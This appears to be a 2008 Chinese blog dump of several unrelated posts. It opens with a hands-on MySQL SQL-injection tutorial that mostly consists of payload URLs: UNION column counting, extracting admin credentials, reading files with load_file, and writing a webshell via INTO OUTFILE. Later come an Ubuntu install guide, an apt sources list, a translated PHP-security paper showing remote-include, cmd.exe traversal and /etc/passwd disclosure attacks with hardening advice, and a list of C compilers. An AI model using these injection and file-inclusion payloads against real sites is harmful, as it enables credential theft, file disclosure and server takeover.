    大家注意看resultSet = statment.executeQuery("select * from account where accountId = '"+ request.getParameter("id") +"'");
这里的request.getParameter("id") 是获取GET传参的id 参数,也就是mysqlInject.jsp?id=1 这里的id. 这样这个SQL语句就变成了select * from account where accountId = '1' 了.如果加以变换呢?

2.1漏洞的检测
我们把id 写成mysqlInject.jsp?id=1' 那么SQL 语句就变成select * from account where accountId = '1'' 了,这样的话SQL语句就会报错,因为SQL语句的值是需要2个包含符号,比如’和”如果只是数字可以什么都不写.如果不报错的话就说明程序替换,过滤或者其他方法来防护了.

那么我们可以继续来测验, mysqlInject.jsp?id=1' and ''=' 那么SQL语句就变成了select * from account where accountId = '1' and '' = '' ,应该返回正常.

有些人说我的为什么返回不正常呢? 有2种原因,第一是程序把恶意字符过滤了;第二是程序的语句和我写的不一样select * from account where accountId = 1' and ''='. 这个问题在下边会谈到.

2.2 Union查询猜此次查询列的数量
    这里有的人会说猜此次查询列的数量有什么用?如果只是检测当然没有,但是你想进一步的利用那么就有大的用处了,文章后边会讲到的,耐心.

    如果懂SQL的人应该知道UNION查询吧?UNION查询就是联合查询,执行第二条查询语句将返回值和本次查询合并.

    大家想想,如果要和本次查询值合并需要一个什么条件呢？需要联合查询的列数和此次查询的列数相等.如果不想等的话就会无法合并,那么就会报错.通过这一特点聪明的你应该会想出这么才列数了吧?

那么我们要的就是使得UNION查询出来的列数与本次查询出来的列数相等.也就是说不报错就会相等.
先从第一列开始猜,那么要把这个语句union select 1构造在地址程序的语句当中.
那么语句就是mysqlInject.jsp?id=1' and union select 1 and ''=' 这样的.
有些人问为什么后边(绿色的部分)要加上and ''=' 呢? 也许大家记了吧,我们的SQL语句是需要两个包含符号的,语句select * from account where accountId = '1' 我们输入的是在1那个位置,所以要去除后边的',否则语句会报错的.
在本程序里也就是' 如果你要想消除' 有很多办法,为了让大家明白所以我现在使用and ''='.
先说一说有几种办法消除这个'
1.    使用 and '' = ' 虽然不够方便,但是在复杂SQL语句里不会报错的.
2.    使用注释 # 或者 /**/, 这样可以把后面的东西全部注释掉,但是有一个大问题,就是在执行复杂SQL语句的时候有可能会报错.
有些人测试,咦?为什么我加了#还是会报错呢?因为本次是使用GET传参,在地址栏传参.大家想想,当初下载带#名称的数据库是什么样子呢?哦,对了,#是地址栏的结束符,就是说#包括#以后的字符全部不传入.所以#在GET模式下注入注入不起作用.

那么有些工具写的在构造注射的时候为什么是mysqlInject.jsp?id=1'/**/and/**/union/**/select/**/1/**/and/**/''/**/= /**/'/* 呢? 因为在程序里边有函数可以把传入参数里面的空格去除,如果去除了空格,将会是程序产生了错误的语句,那么就会一直报错了.所以有些工具就是用/**/这种东西来取代空格了.

那 /**/ 又是什么呢? /**/ 是一种注释,叫做文档注释,就是从/* 开始直到*/ 结束,中间任何代码都会成为注释,所以是程序员在写大量注释时候所使用的一种注释.

那最后的/* 是什么呢? 那个是用来解决 SQL语句包含符号没有成双成对的.

我们开始测试.
mysqlInject.jsp?id=1 '/**/union/**/select/**/1/*
select * from account where accountId = '1 '/**/union/**/select/**/1/*'.

注意到最低下那句话了吗?
javax.servlet.ServletException: The used SELECT statements have a different number of columns
大概意思是”这个使用的查询列数不同”,由此得出此次查询不是查询了一个表.

以此类推, select 1   select 1,2   select 1,2,3  知道正确位置,那么你现在说写的列数也就是本次查询的列数了.

大家看到地下返回 1|2|3| ,这个值是从咱们的UNION查询里合并出来的. 试试把UNION SELECT 1,2,3 换成 UNION SELECT 4,5,6 看看.地下是不是编程了 4|5|6| 了?

有人说你都是骗人的我怎么换,我都换到789了也没有出来,还是现实原来的数据,你骗人;我没有骗人,我也不会骗人;那为什么出不来?
有些程序写的时候只是把数据返回集合的第一行输出,但是UNION查询以后是把数据合并到此次查询以后,那么他只输出了此次查询的数据,其实UNION查询的数据也有,但是他没有输出.那怎么办呢?聪明的人一定会想到. 啊,原来如此,只要让此次查询不输出就可以了.哈哈哈,我聪明了,可是怎么让此次查询不输出呢? 先告诉大家一个简单的方法,看看SQL语句,我们是做过限制条件的. Where accountid = ? ,那么也就是说让这个accoundId 限制到一个没有的id 上那么不就会没有了? 心动不如行动,试试.
mysqlInject.jsp?id=1000'/**/union/**/select/**/4,5,6/*
select * from account where accountId =1000'/**/union/**/select/**/4,5,6/*

哈哈,果然没有了!!! 注意绿色的部分,指定查询一个没有的id ,那么他理所当然的就会蒸发了.
2.3 低几率另类猜此次查询列的数量
    此方法虽然几率低一点,但是会大大减少工作量的.次方法只适用于 select * 的简易SQL语句.
    这个方法是用的是 mysql 里的 order 排序. 排序是按照顺序排下来.我们来写一条SQL语句. Select * from account where accountId = '1' order by accountId 那么这个SQL语句也就是根据 accountId 升序排序. 那么我们不知道他有什么怎么办,而且这怎么猜? 这里是关键问题. MYSQL支持列编号排序Select * from account where accountId = '1' order by 1 这样也就是按照第一列排序.
哎呀,你又在骗我们,排序怎么猜列的数量? 那么我按照一个不存在的列排序呢? 比如第四列? 你一般身上有3个口袋,一个最多10元钱,一天吃一顿,一顿3斤米,一斤米一元,但是你今天吃了4斤米,需要40元,你却只有3个口袋,你就没有40元,你就要挨打了.
也就是说一共有3个列,order by 3 ,按照第3列排序,正常,order by 4,按照第4列排序,没有第4列,出错.那么也就说明他有4列.
这种方法是根据人的经验判断的.我一般使用这个方法都会成功,就是不成功也相差不多.

2.4 使用UNION猜其他表,查询其他表
使用此方法可以查询到其他表里的内容.比如查询管理员的密码等.但是有个前题,必须道要才表的表名和列名. 那怎么才能知道呢? 猜!!! 因为MYSQL 和SQLSERVER 的系统函数不一样,SQLSERVER 里有 SP_HELPDB 而MYSQL 里没有,所以只能猜了.
好,开始构造语句. 我们要猜看看有没有admin表.
mysqlInject.jsp?id=1'/**/union/**/select/**/4,5,6/**/from/**/admin/*
SQL : select * from account where accountId = '1'/**/union/**/select/**/4,5,6/**/from/**/admin/*'

    如果正常的有admin表的话,那么返回是正常的,如果没有的话会报错的.

大家看到了吧? 有admin 这个表,为了让大家更好的理解,我们在猜一个其他不存在的表.

mysqlInject.jsp?id=1'/**/union/**/select/**/4,5,6/**/from/**/helloword/*
SQL : select * from account where accountId = '1'/**/union/**/select/**/4,5,6/**/from/**/ helloword/*'

看到了吧?没有 helloworld 这个表.所以报错了.
    又问,为什么还是会写4,5,6呢? 啊哈,因为我们不知道他的列名,如果写了 * 他将会全部列出来,如果和此次查询的列不相等,那么就会报错了.所以要写一个相等的.
    现在表名出来了,怎么才列名呢?哎呀,大家太聪明了,直接把4,5,6其中一个替换成列名不久行了? 那么构造出.
mysqlInject.jsp?id=1'/**/union/**/select/**/adminId,5,6/**/from/**/admin/*
SQL : select * from account where accountId = '1'/**/union/**/select/**/adminid,5,6/**/from/**/admin/*'

    看见了吗? 1|5|6 的一就是 adminid.如果正常那么就是存在了. 大家可以把列名猜出来,然后带入UNION查询中,这样就查出来管理员帐号或者密码了.现在我要把列名一次全部带入.

mysqlInject.jsp?id=1'/**/union/**/select/**/adminId,adminName,adminPass/**/from/**/admin/*
SQL : select * from account where accountId = '1'/**/union/**/select/**/adminid,adminName,adminPass/**/from/**/admin/*'

    哈哈,出来了, 1|admin|admin| 就是 adminid|adminName|adminPass|
    也可以在union 查询上限制条件,比如你知道有admin这个用户那么就构造 union select adminId,adminName,adminPass from admin where adminName = ‘admin’,看个人的发挥了.
2.5    使用MYSQL 系统函数.
2.5.1.1.1    使用 load_file() 函数显示文件.
  Load_file 顾名思义.就是加载文件,可不是运行啊,是显示内容,但是必须对文件拥有读取权限.我们先来构造一个显示 c:\boot.ini 文件的语句.
mysqlInject.jsp?id=1'/**/union/**/select/**/1,load_file(0x633A5C626F6F742E696E69),3/*
    SQL : select * from account where accountId = '1'/**/union/**/select/**/1, load_file(0x633A5C626F6F742E696E69),3/*'

  看到了吗? C:\boot.ini 文件的内容. 又问,为什么load_file() 里面是乱码呢? 那不是乱码,那个是C:\boot.ini 16进制编码. 因为本函数无法处理直接写的路径,只能能使用16进制或者是 Ascii 编码.所以要将路径转换成 16进制或者是Ascii 编码才可以执行.
  又问,为什么load_file 是在第二列的位置上,不是在第一列或者第三列的位置上呢?因为啊,第一列不行,其他的都可以,第一列是一个 INT类型,一个数字类型,难道你会把你女朋友送进男厕所吗? 呵呵.玩笑.如果是在 linux 下可以使用 / 来列目录 ,但是必须有列目录的权限.
  通过load_file 可以列目录,读文件,但是遇到文件格式编码的时候也许会遇到乱码的问题. 这个问题可以这么解决. 使用 subString 函数, subString(字符串,开始,返回).
  假设我们要返回第三个字符,那么就是mysqlInject.jsp?id=1'/**/union/**/select/**/1,substring(load_file(0x633A5C626F6F742E696E69),3,1) ,3/* 这样我们就返回了第三个字符,用于解决乱码是非常好的办法.
  我近期会做一个这样个工具,将会公布在我的个人主页上.
2.5.1.1.2    使用outfile 写WEBSHELL.
  mysql 有一个功能,就是把查询的结果输出.就是outfile.先来构造一个简单的语句.
  select ‘hello word’ into outfile ‘c:\\a.txt’ 这里是讲 ‘hello word’ 输出到 c:\a.txt
那么在网站也来构造一下.
mysqlInject.jsp?id=1'/**/union/**/select/**/1,'hello',3/**/into/**/outfile/**/'c:\\hello.txt'/*
    SQL : select * from account where accountId = '1'/**/union/**/select/**/1, 'hello',3/**/into/**/outfile/**/’c:\\hello.txt’/*'
   成功插入.但是为什么会报错呢?哦,那是因为你把数据写到文件中,返回集合什么都没有了,当然会报错了.如果你把hello 换成一句话或者其他的,如果写入到网站目录下,那是多么恐怖啊…

2.漏洞的防护和总结
  通过过滤特殊关键字来防护.代码网站很多

Windows中安装Ubuntu 8.04

Sun, 24 Aug 2008 23:17:39 +0000

确保各分区根目录下没有 menu.lst 文件和 ubuntu 文件夹，有的话请改名或删除，以免冲突 —— 这是 wubi 有待改进的地方。

在 win xp 下，用虚拟光驱加载 ubuntu-8.04-desktop-i386.iso ，双击运行其中的 umenu.exe ，选择 install inside windows ，然后有几个参数需要设定：

★ ubuntu 安装分区：建议选择内置硬盘中的分区，而不要选U盘或移动硬盘，以保证更快的速度和更高的成功率。理论上不会影响硬盘上原有的文件，但我不能为您担保 ^_^ 。分区格式可以是 ntfs 或 fat32 ，两者各有优缺点 —— ntfs 支持更多高级特性，但它是微软私有的文件系统格式；fat32 适应性强，大多数操作系统都能读写，但特性比较落后，文件最大不能超过 4 GB。
★ 安装大小：即磁盘映像的大小，如果你需要安装很多软件并且磁盘空间足够，可以选择大一些，反之可以选小些以方便移动。
★ 语言、用户名及密码

此时需联网，因为有少量文件要从网上下载。

设好后点安装，过一会将提示重启。这时可以看到，在您选择安装 ubuntu 的分区中，多了一个名为“ubuntu”的文件夹 —— 磁盘映像文件就在其中。

重启后选择 ubuntu ，即可启动安装程序。若不能正常启动，则在屏幕左上角出现“ Press `ESC’ to enter the menu ”时，按 esc 键，进入启动菜单，选择第二项或第三项或第四项试试。

安装过程是自动的，无需用户干涉。

装好后重启，选择 ubuntu ，即可进入刚装好的系统。

bak

Thu, 31 Jul 2008 10:53:05 +0000

# deb cdrom:[Ubuntu 8.04.1 _Hardy Heron_ - Release i386 (20080702.1)]/ hardy main restricted
# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to
# newer versions of the distribution.

deb http://cn.archive.ubuntu.com/ubuntu/ hardy main restricted
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy main restricted

## Major bug fix updates produced after the final release of the
## distribution.
deb http://cn.archive.ubuntu.com/ubuntu/ hardy-updates main restricted
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy-updates main restricted

## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu
## team, and may not be under a free licence. Please satisfy yourself as to
## your rights to use the software. Also, please note that software in
## universe WILL NOT receive any review or updates from the Ubuntu security
## team.
deb http://cn.archive.ubuntu.com/ubuntu/ hardy universe
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy universe
deb http://cn.archive.ubuntu.com/ubuntu/ hardy-updates universe
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy-updates universe

## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu
## team, and may not be under a free licence. Please satisfy yourself as to
## your rights to use the software. Also, please note that software in
## multiverse WILL NOT receive any review or updates from the Ubuntu
## security team.
deb http://cn.archive.ubuntu.com/ubuntu/ hardy multiverse
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy multiverse
deb http://cn.archive.ubuntu.com/ubuntu/ hardy-updates multiverse
deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy-updates multiverse

## Uncomment the following two lines to add software from the 'backports'
## repository.
## N.B. software from this repository may not have been tested as
## extensively as that contained in the main release, although it includes
## newer versions of some applications which may provide useful features.
## Also, please note that software in backports WILL NOT receive any review
## or updates from the Ubuntu security team.
# deb http://cn.archive.ubuntu.com/ubuntu/ hardy-backports main restricted universe multiverse
# deb-src http://cn.archive.ubuntu.com/ubuntu/ hardy-backports main restricted universe multiverse

## Uncomment the following two lines to add software from Canonical's
## 'partner' repository. This software is not part of Ubuntu, but is
## offered by Canonical and the respective vendors as a service to Ubuntu
## users.
deb http://archive.canonical.com/ubuntu hardy partner
deb-src http://archive.canonical.com/ubuntu hardy partner

deb http://security.ubuntu.com/ubuntu hardy-security main restricted
deb-src http://security.ubuntu.com/ubuntu hardy-security main restricted
deb http://security.ubuntu.com/ubuntu hardy-security universe
deb-src http://security.ubuntu.com/ubuntu hardy-security universe
deb http://security.ubuntu.com/ubuntu hardy-security multiverse
deb-src http://security.ubuntu.com/ubuntu hardy-security multiverse

deb http://ubuntu.cn99.com/ubuntu/ hardy main restricted universe multiverse
deb http://ubuntu.cn99.com/ubuntu/ hardy-security main restricted universe multiverse
deb http://ubuntu.cn99.com/ubuntu/ hardy-updates main restricted universe multiverse
deb http://ubuntu.cn99.com/ubuntu/ hardy-proposed main restricted universe multiverse
deb http://ubuntu.cn99.com/ubuntu/ hardy-backports main restricted universe multiverse
deb-src http://ubuntu.cn99.com/ubuntu/ hardy main restricted universe multiverse
deb-src http://ubuntu.cn99.com/ubuntu/ hardy-security main restricted universe multiverse
deb-src http://ubuntu.cn99.com/ubuntu/ hardy-updates main restricted universe multiverse
deb-src http://ubuntu.cn99.com/ubuntu/ hardy-proposed main restricted universe multiverse
deb-src http://ubuntu.cn99.com/ubuntu/ hardy-backports main restricted universe multiverse

如何对PHP程序中的常见漏洞进行攻击

Tue, 29 Jul 2008 13:06:55 +0000

之所以翻译这篇文章，是因为目前关于CGI安全性的文章都是拿Perl作为例子，而专门介绍ASP，PHP或者JSP安全性的文章则很少。 Shaun Clowes的这篇文章比较全面地介绍了PHP的安全问题，原文可以在http: //www.securereality.com.au /studyinscarlet.txt找到。
由于原文比较长，而且有相当一部分是介绍文章的背景或PHP的基础知识，没有涉及到PHP安全方面的内容，因此我没有翻译。如果你想了解这方面的知识，请参考原文。
文章主要从全局变量，远程文件，文件上载，库文件，Session文件，数据类型和容易出错的函数这几个方面分析了PHP的安全性，并且对如何增强PHP的安全性提出了一些有用的建议。
好了，废话少说，我们言归正传！

[全局变量]

PHP 中的变量不需要事先声明，它们会在第一次使用时自动创建，它们的类型也不需要指定，它们会根据上下文环境自动确定。从程序员的角度来看，这无疑是一种极其方便的处理方法。很显然，这也是快速开发语言的一个很有用的特点。一旦一个变量被创建了，就可以在程序中的任何地方使用。这个特点导致的结果就是程序员很少初始化变量，毕竟，当它们第一次创建时，他们是空的。
很显然，基于PHP的应用程序的主函数一般都是接受用户的输入（主要是表单变量，上载文件和Cookie等），然后对输入数据进行处理，然后把结果返回到客户端浏览器。为了使PHP代码访问用户的输入尽可能容易，实际上PHP是把这些输入数据看作全局变量来处理的。
例如：

很显然，这会显示一个文本框和提交按钮。当用户点击提交按钮时，“test.php”会处理用户的输入，当“test.php”运行时，“$hello” 会包含用户在文本框输入的数据。从这里我们应该看出，攻击者可以按照自己的意愿创建任意的全局变量。如果攻击者不是通过表单输入来调用 “test.php”，而是直接在浏览器地址栏输入http://server/test.php?hello=hi&setup=no，那么，不止是“$hello”被创建，“$setup”也被创建了。
译者注：这两种方法也就是我们通常说的“POST”和“GET”方法。
下面的用户认证代码暴露了PHP的全局变量所导致的安全问题：
if ($pass == "hello")
$auth = 1;
...
if ($auth == 1)
echo "some important information";
?>
上面的代码首先检查用户的密码是否为“hello”，如果匹配的话，设置“$auth”为“1”，即通过认证。之后如果“$suth”为“1”的话，就会显示一些重要信息。
表面看起来是正确的，而且我们中有相当一部分人是这样做的，但是这段代码犯了想当然的错误，它假定“$auth”在没有设置值的时候是空的，却没有想到攻击者可以创建任何全局变量并赋值，通过类似“http://server/test.php?auth=1”的方法，我们完全可以欺骗这段代码，使它相信我们是已经认证过的。
因此，为了提高PHP程序的安全性，我们不能相信任何没有明确定义的变量。如果程序中的变量很多的话，这可是一项非常艰巨的任务。
一种常用的保护方式就是检查数组HTTP_GET[]或POST_VARS[]中的变量，这依赖于我们的提交方式（GET或POST）。当PHP配置为打开“track_vars”选项的话（这是缺省值），用户提交的变量就可以在全局变量和上面提到的数组中获得。
但是值得说明的是，PHP有四个不同的数组变量用来处理用户的输入。HTTP_GET_VARS数组用来处理GET方式提交的变量， HTTP_POST_VARS数组用于处理POST方式提交的变量，HTTP_COOKIE_VARS数组用于处理作为cookie头提交的变量，而对于 HTTP_POST_FILES数组（比较新的PHP才提供），则完全是用户用来提交变量的一种可选方式。用户的一个请求可以很容易的把变量存在这四个数组中，因此一个安全的PHP程序应该检查这四个数组。

[远程文件]

PHP是一种具有丰富特性的语言，提供了大量的函数，使编程者实现某个功能很容易。但是从安全的角度来看，功能越多，要保证它的安全性就越难，远程文件就是说明这个问题的一个很好的例子：
if (!($fd = fopen("$filename", "r"))
echo("Could not open file: $filename
");
?>
上面的脚本试图打开文件“$filename”，如果失败就显示错误信息。很明显，如果我们能够指定“$filename”的话，就能利用这个脚本浏览系统中的任何文件。但是，这个脚本还存在一个不太明显的特性，那就是它可以从任何其它WEB或FTP站点读取文件。实际上，PHP的大多数文件处理函数对远程文件的处理是透明的。
例如：
如果指定“$filename”为“http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir”
则上面的代码实际上是利用主机target上的unicode漏洞，执行了dir命令。
这使得支持远程文件的include()，require()，include_once()和require_once()在上下文环境中变得更有趣。这些函数主要功能是包含指定文件的内容，并且把它们按照PHP代码解释，主要是用在库文件上。
例如：
include($libdir . "/languages.php");
?>
上例中“$libdir”一般是一个在执行代码前已经设置好的路径，如果攻击者能够使得“$libdir”没有被设置的话，那么他就可以改变这个路径。但是攻击者并不能做任何事情，因为他们只能在他们指定的路径中访问文件languages.php（perl中的“Poison null byte”攻击对PHP没有作用）。但是由于有了对远程文件的支持，攻击者就可以做任何事情。例如，攻击者可以在某台服务器上放一个文件 languages.php，包含如下内容：
passthru("/bin/ls /etc");
?>
然后把“$libdir”设置为“http:///”，这样我们就可以在目标主机上执行上面的攻击代码，“/etc”目录的内容作为结果返回到客户的浏览器中。
需要注意的是，攻击服务器（也就是evilhost）应该不能执行PHP代码，否则攻击代码会在攻击服务器，而不是目标服务器执行，如果你想了解具体的技术细节，请参考：http://www.securereality.com.au/sradv00006.txt

[文件上载]

PHP自动支持基于RFC 1867的文件上载，我们看下面的例子：

上面的代码让用户从本地机器选择一个文件，当点击提交后，文件就会被上载到服务器。这显然是很有用的功能，但是PHP的响应方式使这项功能变的不安全。当 PHP第一次接到这种请求，甚至在它开始解析被调用的PHP代码之前，它会先接受远程用户的文件，检查文件的长度是否超过 “$MAX_FILE_SIZE variable”定义的值，如果通过这些测试的话，文件就会被存在本地的一个临时目录中。
因此，攻击者可以发送任意文件给运行PHP的主机，在PHP程序还没有决定是否接受文件上载时，文件已经被存在服务器上了。
这里我就不讨论利用文件上载来对服务器进行DOS攻击的可能性了。
让我们考虑一下处理文件上载的PHP程序，正如我们上面说的，文件被接收并且存在服务器上（位置是在配置文件中指定的，一般是/tmp），扩展名一般是随机的，类似“phpxXuoXG”的形式。PHP程序需要上载文件的信息以便处理它，这可以通过两种方式，一种方式是在PHP 3中已经使用的，另一种是在我们对以前的方法提出安全公告后引入的。
但是，我们可以肯定的说，问题还是存在的，大多数PHP程序还是使用老的方式来处理上载文件。PHP设置了四个全局变量来描述上载文件，比如说上面的例子：
$hello = Filename on local machine (e.g "/tmp/phpxXuoXG")
$hello_size = Size in bytes of file (e.g 1024)
$hello_name = The original name of the file on the remote system (e.g "c: emphello.txt")
$hello_type = Mime type of uploaded file (e.g "text/plain")
然后PHP程序开始处理根据“$hello”指定的文件，问题在于“$hello”不一定是一个PHP设置的变量，任何远程用户都可以指定它。如果我们使用下面的方式：
http://vulnhost/vuln.php?hello=/etc/passwd&hello_size=10240&hello_type=text/plain&hello_name=hello.txt
就导致了下面的PHP全局变量（当然POST方式也可以（甚至是Cookie））：
$hello = "/etc/passwd"
$hello_size = 10240
$hello_type = "text/plain"
$hello_name = "hello.txt"
上面的表单数据正好满足了PHP程序所期望的变量，但是这时PHP程序不再处理上载的文件，而是处理“/etc/passwd”（通常会导致内容暴露）。这种攻击可以用于暴露任何敏感文件的内容。
我在前面已经说了，新版本的PHP使用HTTP_POST_FILES[]来决定上载文件，同时也提供了很多函数来解决这个问题，例如有一个函数用来判断某个文件是不是实际上载的文件。这些函数很好的解决了这个问题，但是实际上肯定有很多PHP程序仍然使用旧的方法，很容易受到这种攻击。
作为文件上载的攻击方法的一个变种，我们看一下下面的一段代码：
if (file_exists($theme)) // Checks the file exists on the local system (no remote files)
include("$theme");
?>
如果攻击者可以控制“$theme”的话，很显然它可以利用“$theme”来读取远程系统上的任何文件。攻击者的最终目标是在远程服务器上执行任意指令，但是他无法使用远程文件，因此，他必须得在远程服务器上创建一个PHP文件。这乍看起来好象是不可能的，但是文件上载帮了我们这个忙，如果攻击者先在本地机器上创建一个包含PHP代码的文件，然后创建一个包含名为“theme”的文件域的表单，最后用这个表单通过文件上载把创建的包含PHP代码的文件提交给上面的代码，PHP就会把攻击者提交的文件保存起来，并把“$theme”的值设置为攻击者提交的文件，这样file_exists()函数会检查通过，攻击者的代码也将执行。
获得执行任意指令的能力之后，攻击者显然想提升权限或者是扩大战果，而这又需要一些服务器上没有的工具集，而文件上载又一次帮了我们这个忙。攻击者可以使用文件上载功能上载工具，把她们存在服务器上，然后利用他们执行指令的能力，使用chmod()改变文件的权限，然后执行。例如：攻击者可以绕过防火墙或IDS上载一个本地root攻击程序，然后执行，这样就获得了root权限。

[库文件]

正如我们前面讨论的那样，include()和require()主要是为了支持代码库，因为我们一般是把一些经常使用的函数放到一个独立的文件中，这个独立的文件就是代码库，当需要使用其中的函数时，我们只要把这个代码库包含到当前的文件中就可以了。
最初，人们开发和发布PHP程序的时候，为了区别代码库和主程序代码，一般是为代码库文件设置一个“.inc”的扩展名，但是他们很快发现这是一个错误，因为这样的文件无法被PHP解释器正确解析为PHP代码。如果我们直接请求服务器上的这种文件时，我们就会得到该文件的源代码，这是因为当把PHP作为 Apache的模块使用时，PHP解释器是根据文件的扩展名来决定是否解析为PHP代码的。扩展名是站点管理员指定的，一般是 “.php”， “.php3”和“.php4”。如果重要的配置数据被包含在没有合适的扩展名的PHP文件中，那么远程攻击者很容易得到这些信息。
最简单的解决方法就是给每个文件都指定一个PHP文件的扩展名，这样可以很好的防止泄露源代码的问题，但是又产生了新的问题，通过请求这个文件，攻击者可能使本该在上下文环境中运行的代码独立运行，这可能导致前面讨论的全部攻击。
下面是一个很明显的例子：
In main.php:
$libDir = "/libdir";
$langDir = "$libdir/languages";
...
include("$libdir/loadlanguage.php":
?>
In libdir/loadlanguage.php:
...
include("$langDir/$userLang");
?>
当 “libdir/loadlanguage.php” 被“main.php”调用时是相当安全的，但是因为“libdir/loadlanguage” 具有“.php”的扩展名，因此远程攻击者可以直接请求这个文件，并且可以任意指定“$langDir”和“$userLang”的值。

[Session文件]

PHP 4 或更新的版本提供了对sessions的支持，它的主要作用是在PHP程序中保存页与页之间的状态信息。例如，当一个用户登陆进入网站，他登陆了这个事实以及谁登陆进入这个网站都被保存在session中，当他在网站中到处浏览时，所有的PHP代码都可以获得这些状态信息。
事实上，当一个session启动时（实际上是在配置文件中设置为在第一次请求时自动启动），就会生成一个随机的“session id”，如果远程浏览器总是在发送请求时提交这个“session id”的话，session就会一直保持。这通过Cookie很容易实现，也可以通过在每页提交一个表单变量（包含“session id”）来实现。PHP程序可以用session注册一个特殊的变量，它的值会在每个PHP脚本结束后存在session文件中，也会在每个PHP脚本开始前加载到变量中。下面是一个简单的例子：
session_destroy(); // Kill any data currently in the session
$session_auth = "shaun";
session_register("session_auth"); // Register $session_auth as a session variable
?>
新版本的PHP都会自动把“$session_auth”的值设置为“shaun”，如果它们被修改的话，以后的脚本都会自动接受修改后的值，这对无状态的Web来说的确是种很不错的工具，但是我们也应该小心。
一个很明显的问题就是确保变量的确来自session，例如，给定上面的代码，如果后续的脚本是下面这样的话：
if (!empty($session_auth))
// Grant access to site here
?>
上面的代码假定如果“$session_auth”被置位的话，就是从session，而不是从用户输入来置位的，如果攻击者通过表单输入来置位的话，他就可以获得对站点的访问权。注意攻击者必须在session注册该变量之前使用这种攻击方法，一旦变量被放进了session，就会覆盖任何表单输入。
Session 数据一般是保存在文件中（位置是可配置的，一般是“/tmp”），文件名一般是类似 “sess_”的形式，这个文件包含变量名称，变量类型，变量值和一些其它的数据。在多主机系统中，因为文件是以运行Web服务器的用户身份（一般是 nobody）保存的，因此恶意的站点拥有者就可以通过创建一个session文件来获得对其它站点的访问，甚至可以检查session文件中的敏感信息。
Session机制也为攻击者把自己的输入保存在远程系统的文件中提供了另一个方便的地方，对于上面的例子来说，攻击者需要在远程系统放置一个包含PHP代码的文件，如果不能利用文件上载做到的话，他通常会利用session为一个变量按照自己的意愿赋一个值，然后猜测 session文件的位置，而他知道文件名是“php”，所以只需猜测目录，而目录一般就是 “/tmp”。
另外，攻击者可以任意指定“session id”（例如“hello”），然后用这个“session id”创建一个session文件（例如“/tmp/sess_hello”），但是“session id”只能是字母和数字组合。

[数据类型]

PHP 具有比较松散的数据类型，变量的类型依赖于它们所处的上下文环境。例如：“$hello”开始是字符串变量，值为“”，但是在求值时，就变成了整形变量 “0”，这有时可能会导致一些意想不到的结果。如果“$hello”的值为“000”还是为“0”是不同的，empty()返回的结果也不会为真。
PHP中的数组是关联数组，也就是说，数组的索引是字符串型的。这意味着“$hello["000"]”和“$hello[0]”也是不同的。
开发程序的时候应该仔细地考虑上面的问题，例如，我们不应该在一个地方测试某个变量是否为“0”，而在另外的地方使用empty()来验证。

[容易出错的函数]

我们在分析PHP程序中的漏洞时，如果能够拿到源代码的话，那么一份容易出错的函数列表则是我们非常需要的。如果我们能够远程改变这些函数的参数的话，那么我们就很可能发现其中的漏洞。下面是一份比较详细的容易出错的函数列表：

require()：读取指定文件的内容并且作为PHP代码解释
include()：同上
eval()：把给定的字符串作为PHP代码执行
preg_replace()：当与“/e”开关一起使用时，替换字符串将被解释为PHP代码

<命令执行>

exec()：执行指定的命令，返回执行结果的最后一行
passthru()：执行指定命令，返回所有结果到客户浏览器
``：执行指定命令，返回所有结果到一个数组
system()：同passthru()，但是不处理二进制数据
popen()：执行指定的命令，把输入或输出连接到PHP文件描述符

<文件泄露>

fopen()：打开文件，并对应一个PHP文件描述符
readfile()：读取文件的内容，然后输出到客户浏览器
file()：把整个文件内容读到一个数组中
译者注：其实这份列表还不是很全，比如“mail()”等命令也可能执行命令，所以需要自己补充一下。

[如何增强PHP的安全性]

我在上面介绍的所有攻击对于缺省安装的PHP 4都可以很好的实现，但是我已经重复了很多次，PHP的配置非常灵活，通过配置一些PHP选项，我们完全可能抵抗其中的一些攻击。下面我按照实现的难度对一些配置进行了分类：
*低难度
**中低难度
***中高难度
****高难度
上面的分类只是个人的看法，但是我可以保证，如果你使用了PHP提供的所有选项的话，那么你的PHP将是很安全的，即使是第三方的代码也是如此，因为其中很多功能已经不能使用。
**** 设置“register_globals”为“off”
这个选项会禁止PHP为用户输入创建全局变量，也就是说，如果用户提交表单变量“hello”，PHP不会创建“$ hello”，而只会创建 “HTTP_GET/POST_VARS['hello']”。这是PHP中一个极其重要的选项，关闭这个选项，会给编程带来很大的不便。
*** 设置“safe_mode”为“on”
打开这个选项，会增加如下限制：
1．限制哪个命令可以被执行
2．限制哪个函数可以被使用
3．基于脚本所有权和目标文件所有权的文件访问限制
4．禁止文件上载功能
这对于ISP来说是一个伟大的选项，同时它也能极大地改进PHP的安全性。
** 设置“open_basedir”
这个选项可以禁止指定目录之外的文件操作，有效地消除了本地文件或者是远程文件被include()的攻击，但是仍需要注意文件上载和session文件的攻击。
** 设置“display_errors”为“off”，设置“log_errors”为“on”
这个选项禁止把错误信息显示在网页中，而是记录到日志文件中，这可以有效的抵制攻击者对目标脚本中函数的探测。
* 设置“allow_url_fopen”为“off”
这个选项可以禁止远程文件功能

c 学习资源

Thu, 24 Jul 2008 02:54:13 +0000

Compiler:
Borland C++ Compiler for Windows 5.5
http://www.codegear.com/downloads/free/cppbuilder
免费，只能在Windows下使用，并且版本很老

Cygwin
http://cygwin.com
Windows下的Linux模拟环境，在我看来还不如直接安个linux用

Digital Mars C/C++ and D Compilers
http://www.digitalmars.com
我似乎没有在include目录下找到STL的实现

GCC
http://gcc.gnu.org/mirrors.html
已经更新到4.3.0版本了，4.4.0也正在开发中，增加了好几个C++09的特性。极力推荐

Intel C/C++ Compilers
http://www.intel.com/cd/software/products/asmo-na/eng/compilers/284132.htm
Windows版收费，Linux免费，自己权衡吧

MinGW - Minimalist GNU for Windows
http://www.mingw.org
Windows下想用GCC好像只有用MinGW了

Open Watcom
http://www.openwatcom.org/index.php/Main_Page
“训练有素的”编译器，以代码优化和执行效率高著称，可惜那是很早以前的事情了

Visual Studio 2008 Express- Downloads
